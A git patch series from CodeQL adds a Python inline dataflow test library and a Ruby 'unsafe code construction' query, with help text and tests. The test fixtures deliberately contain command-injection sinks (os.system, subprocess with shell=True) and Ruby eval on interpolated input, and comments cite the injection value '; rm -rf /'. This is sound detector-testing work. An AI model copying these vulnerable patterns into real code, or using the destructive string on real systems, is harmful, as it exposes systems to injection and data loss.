From f486c44b00c5759cea34b15bf372070016b0d5bc Mon Sep 17 00:00:00 2001 From: Rasmus Lerchedahl Petersen Date: Wed, 2 Nov 2022 16:18:36 +0100 Subject: [PATCH 001/381] python: library for inline query tests similar to the consistency queires used in js but based on the inline expectations framework --- .../dataflow/TestUtil/DataflowQueryTest.qll | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll diff --git a/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll b/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll new file mode 100644 index 00000000000..bb3a56160f3 --- /dev/null +++ b/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll @@ -0,0 +1,28 @@ +import python +import experimental.dataflow.TestUtil.FlowTest +private import semmle.python.dataflow.new.internal.PrintNode + +class DataFlowQueryTest extends FlowTest { + DataFlowQueryTest() { this = "DataFlowQueryTest" } + + override string flowTag() { result = "flow" } + + override predicate relevantFlow(DataFlow::Node source, DataFlow::Node sink) { + exists(DataFlow::Configuration cfg | cfg.hasFlow(source, sink)) + } +} + +query predicate missingAnnotationOnSink(Location location, string error, string element) { + error = "ERROR, you should add `# $ MISSING: flow` annotation" and + exists(DataFlow::Node sink | + exists(DataFlow::Configuration cfg | cfg.isSink(sink)) and + location = sink.getLocation() and + element = prettyExpr(sink.asExpr()) and + not any(DataFlow::Configuration config).hasFlow(_, sink) and + not exists(FalseNegativeExpectation missingResult | + missingResult.getTag() = "flow" and + missingResult.getLocation().getFile() = location.getFile() and + missingResult.getLocation().getStartLine() = location.getStartLine() + ) + ) +} From 0a7cfad04892cda48d0f34bccf68269165674947 Mon Sep 17 00:00:00 2001 From: Rasmus Lerchedahl Petersen Date: Wed, 2 Nov 2022 16:21:59 +0100 Subject: [PATCH 002/381] python: inline query tests for command injection note how the test file is partially annotated and those annotations can now be expressed In this particular test file, absolute line numbers might have been better than relative ones. We might remove line numbers altogether, but should check more querries to see how it looks. --- .../DataflowQueryTest.expected | 2 ++ .../DataflowQueryTest.ql | 3 +++ .../command_injection.py | 26 +++++++++---------- 3 files changed, 18 insertions(+), 13 deletions(-) create mode 100644 python/ql/test/query-tests/Security/CWE-078-CommandInjection/DataflowQueryTest.expected create mode 100644 python/ql/test/query-tests/Security/CWE-078-CommandInjection/DataflowQueryTest.ql diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/DataflowQueryTest.expected b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/DataflowQueryTest.expected new file mode 100644 index 00000000000..3875da4e143 --- /dev/null +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/DataflowQueryTest.expected @@ -0,0 +1,2 @@ +missingAnnotationOnSink +failures diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/DataflowQueryTest.ql b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/DataflowQueryTest.ql new file mode 100644 index 00000000000..c69cc5c7578 --- /dev/null +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/DataflowQueryTest.ql @@ -0,0 +1,3 @@ +import python +import experimental.dataflow.TestUtil.DataflowQueryTest +import semmle.python.security.dataflow.CommandInjectionQuery diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/command_injection.py b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/command_injection.py index 978a2bf986c..ef8cb221ea0 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/command_injection.py +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/command_injection.py @@ -10,27 +10,27 @@ app = Flask(__name__) def command_injection1(): files = request.args.get('files', '') # Don't let files be `; rm -rf /` - os.system("ls " + files) + os.system("ls " + files) # $flow="ImportMember, l:-8 -> BinaryExpr" @app.route("/command2") def command_injection2(): files = request.args.get('files', '') # Don't let files be `; rm -rf /` - subprocess.Popen("ls " + files, shell=True) + subprocess.Popen("ls " + files, shell=True) # $flow="ImportMember, l:-15 -> BinaryExpr" @app.route("/command3") def first_arg_injection(): cmd = request.args.get('cmd', '') - subprocess.Popen([cmd, "param1"]) + subprocess.Popen([cmd, "param1"]) # $flow="ImportMember, l:-21 -> cmd" @app.route("/other_cases") def others(): files = request.args.get('files', '') # Don't let files be `; rm -rf /` - os.popen("ls " + files) + os.popen("ls " + files) # $flow="ImportMember, l:-28 -> BinaryExpr" @app.route("/multiple") @@ -38,8 +38,8 @@ def multiple(): command = request.args.get('command', '') # We should mark flow to both calls here, which conflicts with removing flow out of # a sink due to use-use flow. - os.system(command) - os.system(command) + os.system(command) # $flow="ImportMember, l:-36 -> command" + os.system(command) # $flow="ImportMember, l:-37 -> command" @app.route("/not-into-sink-impl") @@ -52,11 +52,11 @@ def not_into_sink_impl(): subprocess.call implementation: https://github.com/python/cpython/blob/fa7ce080175f65d678a7d5756c94f82887fc9803/Lib/subprocess.py#L341 """ command = request.args.get('command', '') - os.system(command) - os.popen(command) - subprocess.call(command) - subprocess.check_call(command) - subprocess.run(command) + os.system(command) # $flow="ImportMember, l:-50 -> command" + os.popen(command) # $flow="ImportMember, l:-51 -> command" + subprocess.call(command) # $flow="ImportMember, l:-52 -> command" + subprocess.check_call(command) # $flow="ImportMember, l:-53 -> command" + subprocess.run(command) # $flow="ImportMember, l:-54 -> command" @app.route("/path-exists-not-sanitizer") @@ -70,11 +70,11 @@ def path_exists_not_sanitizer(): """ path = request.args.get('path', '') if os.path.exists(path): - os.system("ls " + path) # NOT OK + os.system("ls " + path) # $flow="ImportMember, l:-68 -> BinaryExpr" @app.route("/restricted-characters") def restricted_characters(): path = request.args.get('path', '') if re.match(r'^[a-zA-Z0-9_-]+$', path): - os.system("ls " + path) # OK (TODO: Currently FP) + os.system("ls " + path) # $SPURIOUS: flow="ImportMember, l:-75 -> BinaryExpr" From 5f6cb1684b012038ed64c219822def1addd48839 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 17 Oct 2022 16:50:29 +0200 Subject: [PATCH 003/381] move the code-injection tests into a subfolder --- .../security/cwe-094/{ => CodeInjection}/CodeInjection.expected | 0 .../security/cwe-094/{ => CodeInjection}/CodeInjection.qlref | 0 .../security/cwe-094/{ => CodeInjection}/CodeInjection.rb | 0 3 files changed, 0 insertions(+), 0 deletions(-) rename ruby/ql/test/query-tests/security/cwe-094/{ => CodeInjection}/CodeInjection.expected (100%) rename ruby/ql/test/query-tests/security/cwe-094/{ => CodeInjection}/CodeInjection.qlref (100%) rename ruby/ql/test/query-tests/security/cwe-094/{ => CodeInjection}/CodeInjection.rb (100%) diff --git a/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.expected b/ruby/ql/test/query-tests/security/cwe-094/CodeInjection/CodeInjection.expected similarity index 100% rename from ruby/ql/test/query-tests/security/cwe-094/CodeInjection.expected rename to ruby/ql/test/query-tests/security/cwe-094/CodeInjection/CodeInjection.expected diff --git a/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.qlref b/ruby/ql/test/query-tests/security/cwe-094/CodeInjection/CodeInjection.qlref similarity index 100% rename from ruby/ql/test/query-tests/security/cwe-094/CodeInjection.qlref rename to ruby/ql/test/query-tests/security/cwe-094/CodeInjection/CodeInjection.qlref diff --git a/ruby/ql/test/query-tests/security/cwe-094/CodeInjection.rb b/ruby/ql/test/query-tests/security/cwe-094/CodeInjection/CodeInjection.rb similarity index 100% rename from ruby/ql/test/query-tests/security/cwe-094/CodeInjection.rb rename to ruby/ql/test/query-tests/security/cwe-094/CodeInjection/CodeInjection.rb From f1668801d3ded16ac25f190e581904b21530cdee Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 17 Oct 2022 16:52:08 +0200 Subject: [PATCH 004/381] add a `rb/unsafe-code-construction` query rebase --- .../UnsafeCodeConstructionCustomizations.qll | 94 +++++++++++++++++++ .../security/UnsafeCodeConstructionQuery.qll | 33 +++++++ .../cwe-094/UnsafeCodeConstruction.qhelp | 55 +++++++++++ .../cwe-094/UnsafeCodeConstruction.ql | 23 +++++ .../examples/UnsafeCodeConstruction.rb | 10 ++ .../examples/UnsafeCodeConstructionSafe.rb | 11 +++ .../UnsafeCodeConstruction.expected | 16 ++++ .../UnsafeCodeConstruction.qlref | 1 + .../UnsafeCodeConstruction/impl/unsafeCode.rb | 19 ++++ .../unsafe-code.gemspec | 5 + 10 files changed, 267 insertions(+) create mode 100644 ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll create mode 100644 ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll create mode 100644 ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp create mode 100644 ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.ql create mode 100644 ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction.rb create mode 100644 ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstructionSafe.rb create mode 100644 ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected create mode 100644 ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref create mode 100644 ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb create mode 100644 ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/unsafe-code.gemspec diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll new file mode 100644 index 00000000000..188bbb34cc9 --- /dev/null +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll @@ -0,0 +1,94 @@ +/** + * Provides default sources, sinks and sanitizers for reasoning about + * code constructed from library input vulnerabilities, as + * well as extension points for adding your own. + */ + +private import codeql.ruby.DataFlow +private import codeql.ruby.ApiGraphs +private import codeql.ruby.frameworks.core.Gem::Gem as Gem +private import codeql.ruby.AST as Ast +private import codeql.ruby.Concepts as Concepts + +/** + * Module containing sources, sinks, and sanitizers for code constructed from library input. + */ +module UnsafeCodeConstruction { + /** A source for code constructed from library input vulnerabilities. */ + abstract class Source extends DataFlow::Node { } + + /** An input parameter to a gem seen as a source. */ + private class LibraryInputAsSource extends Source instanceof DataFlow::ParameterNode { + LibraryInputAsSource() { this = Gem::getALibraryInput() } + } + + /** A sink for code constructed from library input vulnerabilities. */ + abstract class Sink extends DataFlow::Node { + /** + * Gets the node where the unsafe code is executed. + */ + abstract DataFlow::Node getCodeSink(); + + /** + * Gets the type of sink. + */ + string getSinkType() { result = "code construction" } + } + + /** Gets a node that is eventually executed as code at `codeExec`. */ + DataFlow::Node getANodeExecutedAsCode(Concepts::CodeExecution codeExec) { + result = getANodeExecutedAsCode(TypeTracker::TypeBackTracker::end(), codeExec) + } + + import codeql.ruby.typetracking.TypeTracker as TypeTracker + + /** Gets a node that is eventually executed as code at `codeExec`, type-tracked with `t`. */ + private DataFlow::LocalSourceNode getANodeExecutedAsCode( + TypeTracker::TypeBackTracker t, Concepts::CodeExecution codeExec + ) { + t.start() and + result = codeExec.getCode().getALocalSource() + or + exists(TypeTracker::TypeBackTracker t2 | + result = getANodeExecutedAsCode(t2, codeExec).backtrack(t2, t) + ) + } + + /** + * A string constructed from a string-literal (e.g. `"foo #{sink}"`), + * where the resulting string ends up being executed as a code. + */ + class StringFormatAsSink extends Sink { + Concepts::CodeExecution s; + Ast::StringLiteral lit; + + StringFormatAsSink() { + any(DataFlow::Node n | n.asExpr().getExpr() = lit) = getANodeExecutedAsCode(s) and + this.asExpr().getExpr() = lit.getComponent(_) + } + + override DataFlow::Node getCodeSink() { result = s } + + override string getSinkType() { result = "string interpolation" } + } + + import codeql.ruby.security.TaintedFormatStringSpecific as TaintedFormat + + /** + * A string constructed from a printf-style call, + * where the resulting string ends up being executed as a code. + */ + class TaintedFormatStringAsSink extends Sink { + Concepts::CodeExecution s; + TaintedFormat::PrintfStyleCall call; + + TaintedFormatStringAsSink() { + call = getANodeExecutedAsCode(s) and + this = [call.getFormatArgument(_), call.getFormatString()] + } + + override DataFlow::Node getCodeSink() { result = s } + + override string getSinkType() { result = "string format" } + } +} diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll new file mode 100644 index 00000000000..4b27a258716 --- /dev/null +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionQuery.qll @@ -0,0 +1,33 @@ +/** + * Provides a taint-tracking configuration for reasoning about code + * constructed from library input vulnerabilities. + * + * Note, for performance reasons: only import this file if `Configuration` is needed, + * otherwise `UnsafeCodeConstructionCustomizations` should be imported instead. + */ + +import codeql.ruby.DataFlow +import UnsafeCodeConstructionCustomizations::UnsafeCodeConstruction +private import codeql.ruby.TaintTracking +private import codeql.ruby.dataflow.BarrierGuards + +/** + * A taint-tracking configuration for detecting shell command constructed from library input vulnerabilities. + */ +class Configuration extends TaintTracking::Configuration { + Configuration() { this = "UnsafeShellCommandConstruction" } + + override predicate isSource(DataFlow::Node source) { source instanceof Source } + + override predicate isSink(DataFlow::Node sink) { sink instanceof Sink } + + override predicate isSanitizer(DataFlow::Node node) { + node instanceof StringConstCompareBarrier or + node instanceof StringConstArrayInclusionCallBarrier + } + + // override to require the path doesn't have unmatched return steps + override DataFlow::FlowFeature getAFeature() { + result instanceof DataFlow::FeatureHasSourceCallContext + } +} diff --git a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp new file mode 100644 index 00000000000..c430259b029 --- /dev/null +++ b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp @@ -0,0 +1,55 @@ + + + + +

+When a library function dynamically constructs code in a potentially unsafe way, then +it's important to document to clients of the library that the function should only be +used with trusted inputs. + +If the function is not documented as being potentially unsafe, then a client may +incorrectly use inputs containing unsafe code fragments, and thereby leave the +client vulnerable to code-injection attacks. +

+ + + + +

+Properly document library functions that construct code from unsanitized +inputs, or avoid constructing code in the first place. +

+ + + +

+The following example shows two methods implemented using `eval`: a simple +deserialization routine and a getter method. +If untrusted inputs are used with these methods, +then an attacker might be able to execute arbitrary code on the system. +

+ + + +

+To avoid this problem, either properly document that the function is potentially +unsafe, or use an alternative solution such as `JSON.parse` or another library, like in the examples below, +that does not allow arbitrary code to be executed. +

+ + + + + + +
  • +OWASP: +Code Injection. +
    • +
  • +Wikipedia: Code Injection. +
    • +     +     diff --git a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.ql b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.ql new file mode 100644 index 00000000000..6b7b923e934 --- /dev/null +++ b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.ql @@ -0,0 +1,23 @@ +/** + * @name Unsafe code constructed from library input + * @description Using externally controlled strings to construct code may allow a malicious + * user to execute arbitrary code. + * @kind path-problem + * @problem.severity warning + * @security-severity 6.1 + * @precision medium + * @id rb/unsafe-code-construction + * @tags security + * external/cwe/cwe-094 + * external/cwe/cwe-079 + * external/cwe/cwe-116 + */ + +import codeql.ruby.security.UnsafeCodeConstructionQuery +import DataFlow::PathGraph + +from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink, Sink sinkNode +where cfg.hasFlowPath(source, sink) and sinkNode = sink.getNode() +select sink.getNode(), source, sink, + "This " + sinkNode.getSinkType() + " which depends on $@ is later $@.", source.getNode(), + "library input", sinkNode.getCodeSink(), "interpreted as code" diff --git a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction.rb b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction.rb new file mode 100644 index 00000000000..d900a950a50 --- /dev/null +++ b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction.rb @@ -0,0 +1,10 @@ +module MyLib + def unsafeDeserialize(value) + eval("foo = #{value}") + foo + end + + def unsafeGetter(obj, path) + eval("obj.#{path}") + end +end diff --git a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstructionSafe.rb b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstructionSafe.rb new file mode 100644 index 00000000000..aa2445ae234 --- /dev/null +++ b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstructionSafe.rb @@ -0,0 +1,11 @@ +require 'json' + +module MyLib + def safeDeserialize(value) + JSON.parse(value) + end + + def safeGetter(obj, path) + obj.dig(*path.split(".")) + end +end diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected new file mode 100644 index 00000000000..56fc308e99d --- /dev/null +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected @@ -0,0 +1,16 @@ +edges +| impl/unsafeCode.rb:2:12:2:17 | target : | impl/unsafeCode.rb:3:17:3:25 | #{...} | +| impl/unsafeCode.rb:7:12:7:12 | x : | impl/unsafeCode.rb:8:30:8:30 | x | +| impl/unsafeCode.rb:12:12:12:12 | x : | impl/unsafeCode.rb:13:33:13:33 | x | +nodes +| impl/unsafeCode.rb:2:12:2:17 | target : | semmle.label | target : | +| impl/unsafeCode.rb:3:17:3:25 | #{...} | semmle.label | #{...} | +| impl/unsafeCode.rb:7:12:7:12 | x : | semmle.label | x : | +| impl/unsafeCode.rb:8:30:8:30 | x | semmle.label | x | +| impl/unsafeCode.rb:12:12:12:12 | x : | semmle.label | x : | +| impl/unsafeCode.rb:13:33:13:33 | x | semmle.label | x | +subpaths +#select +| impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target : | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x : | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | +| impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x : | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref new file mode 100644 index 00000000000..ec336901db5 --- /dev/null +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref @@ -0,0 +1 @@ +queries/security/cwe-094/UnsafeCodeConstruction.ql \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb new file mode 100644 index 00000000000..4ee84d07ad2 --- /dev/null +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb @@ -0,0 +1,19 @@ +class Foobar + def foo1(target) + eval("foo = #{target}") # NOT OK + end + + # sprintf + def foo2(x) + eval(sprintf("foo = %s", x)) # NOT OK + end + + # String#% + def foo3(x) + eval("foo = %{foo}" % {foo: x}) # NOT OK + end + + def indirect_eval(x) + eval(x) # OK - no construction. + end +end diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/unsafe-code.gemspec b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/unsafe-code.gemspec new file mode 100644 index 00000000000..ab9639a5fc6 --- /dev/null +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/unsafe-code.gemspec @@ -0,0 +1,5 @@ +Gem::Specification.new do |s| + s.name = 'unsafe-code' + s.require_path = "impl" + end + \ No newline at end of file From e7c6571f5240dde63851c808d56348f0b7a55866 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 17 Oct 2022 21:00:59 +0200 Subject: [PATCH 005/381] remove the "send(..)" and similar from unsafe-code-construction --- .../ruby/security/UnsafeCodeConstructionCustomizations.qll | 3 ++- .../cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb | 4 ++++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll index 188bbb34cc9..07ca5978a8a 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll @@ -47,7 +47,8 @@ module UnsafeCodeConstruction { TypeTracker::TypeBackTracker t, Concepts::CodeExecution codeExec ) { t.start() and - result = codeExec.getCode().getALocalSource() + result = codeExec.getCode().getALocalSource() and + codeExec.runsArbitraryCode() // methods like `Object.send` is benign here, because of the string-construction the attacker cannot control the entire method name or exists(TypeTracker::TypeBackTracker t2 | result = getANodeExecutedAsCode(t2, codeExec).backtrack(t2, t) diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb index 4ee84d07ad2..30bf04bab84 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb @@ -16,4 +16,8 @@ class Foobar def indirect_eval(x) eval(x) # OK - no construction. end + + def send_stuff(x) + foo.send("foo_#{x}") # OK - attacker cannot control entire string. + end end From 2033dd2dcc96ef903bceba0aa9a7de7165416b40 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Tue, 18 Oct 2022 12:35:30 +0200 Subject: [PATCH 006/381] remove parameters named "code" as source --- .../ruby/security/UnsafeCodeConstructionCustomizations.qll | 5 ++++- .../cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb | 4 ++++ 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll index 07ca5978a8a..fe261de3dca 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll @@ -19,7 +19,10 @@ module UnsafeCodeConstruction { /** An input parameter to a gem seen as a source. */ private class LibraryInputAsSource extends Source instanceof DataFlow::ParameterNode { - LibraryInputAsSource() { this = Gem::getALibraryInput() } + LibraryInputAsSource() { + this = Gem::getALibraryInput() and + not this.getName() = "code" + } } /** A sink for code constructed from library input vulnerabilities. */ diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb index 30bf04bab84..d7d720d5d32 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb @@ -20,4 +20,8 @@ class Foobar def send_stuff(x) foo.send("foo_#{x}") # OK - attacker cannot control entire string. end + + def named_code(code) + foo.send("def \n #{code} \n end") # OK - parameter is named code + end end From 0f2a48f461ea33962bb9477cf7fbbbc0a4efedb9 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Tue, 18 Oct 2022 12:37:50 +0200 Subject: [PATCH 007/381] fix QL-for-QL warnings --- .../UnsafeCodeConstructionCustomizations.qll | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll index fe261de3dca..6a03718808c 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll @@ -64,11 +64,12 @@ module UnsafeCodeConstruction { */ class StringFormatAsSink extends Sink { Concepts::CodeExecution s; - Ast::StringLiteral lit; StringFormatAsSink() { - any(DataFlow::Node n | n.asExpr().getExpr() = lit) = getANodeExecutedAsCode(s) and - this.asExpr().getExpr() = lit.getComponent(_) + exists(Ast::StringLiteral lit | + any(DataFlow::Node n | n.asExpr().getExpr() = lit) = getANodeExecutedAsCode(s) and + this.asExpr().getExpr() = lit.getComponent(_) + ) } override DataFlow::Node getCodeSink() { result = s } @@ -84,11 +85,12 @@ module UnsafeCodeConstruction { */ class TaintedFormatStringAsSink extends Sink { Concepts::CodeExecution s; - TaintedFormat::PrintfStyleCall call; TaintedFormatStringAsSink() { - call = getANodeExecutedAsCode(s) and - this = [call.getFormatArgument(_), call.getFormatString()] + exists(TaintedFormat::PrintfStyleCall call | + call = getANodeExecutedAsCode(s) and + this = [call.getFormatArgument(_), call.getFormatString()] + ) } override DataFlow::Node getCodeSink() { result = s } From 3461404bbba7d417779eec305cdfcc3a13bb9112 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Thu, 24 Nov 2022 17:35:27 +0100 Subject: [PATCH 008/381] add basic support for arrays --- .../UnsafeCodeConstructionCustomizations.qll | 22 +++++++++++++++++-- .../UnsafeCodeConstruction.expected | 4 ++++ .../UnsafeCodeConstruction/impl/unsafeCode.rb | 7 ++++++ 3 files changed, 31 insertions(+), 2 deletions(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll index 6a03718808c..559a21f761a 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll @@ -4,10 +4,9 @@ * well as extension points for adding your own. */ -private import codeql.ruby.DataFlow +private import ruby private import codeql.ruby.ApiGraphs private import codeql.ruby.frameworks.core.Gem::Gem as Gem -private import codeql.ruby.AST as Ast private import codeql.ruby.Concepts as Concepts /** @@ -58,6 +57,25 @@ module UnsafeCodeConstruction { ) } + /** + * A string constructed using a `.join(...)` call, where the resulting string ends up being executed as code. + */ + class ArrayJoin extends Sink { + Concepts::CodeExecution s; + DataFlow::CallNode call; + + ArrayJoin() { + call.getMethodName() = "join" and + call.getNumberOfArguments() = 1 and // any string. E.g. ";" or "\n". + call = getANodeExecutedAsCode(s) and + this = call.getReceiver() + } + + override DataFlow::Node getCodeSink() { result = s } + + override string getSinkType() { result = "array" } + } + /** * A string constructed from a string-literal (e.g. `"foo #{sink}"`), * where the resulting string ends up being executed as a code. diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected index 56fc308e99d..1f4d4e33719 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected @@ -2,6 +2,7 @@ edges | impl/unsafeCode.rb:2:12:2:17 | target : | impl/unsafeCode.rb:3:17:3:25 | #{...} | | impl/unsafeCode.rb:7:12:7:12 | x : | impl/unsafeCode.rb:8:30:8:30 | x | | impl/unsafeCode.rb:12:12:12:12 | x : | impl/unsafeCode.rb:13:33:13:33 | x | +| impl/unsafeCode.rb:28:17:28:22 | my_arr : | impl/unsafeCode.rb:29:10:29:15 | my_arr | nodes | impl/unsafeCode.rb:2:12:2:17 | target : | semmle.label | target : | | impl/unsafeCode.rb:3:17:3:25 | #{...} | semmle.label | #{...} | @@ -9,8 +10,11 @@ nodes | impl/unsafeCode.rb:8:30:8:30 | x | semmle.label | x | | impl/unsafeCode.rb:12:12:12:12 | x : | semmle.label | x : | | impl/unsafeCode.rb:13:33:13:33 | x | semmle.label | x | +| impl/unsafeCode.rb:28:17:28:22 | my_arr : | semmle.label | my_arr : | +| impl/unsafeCode.rb:29:10:29:15 | my_arr | semmle.label | my_arr | subpaths #select | impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target : | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | | impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x : | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | | impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x : | 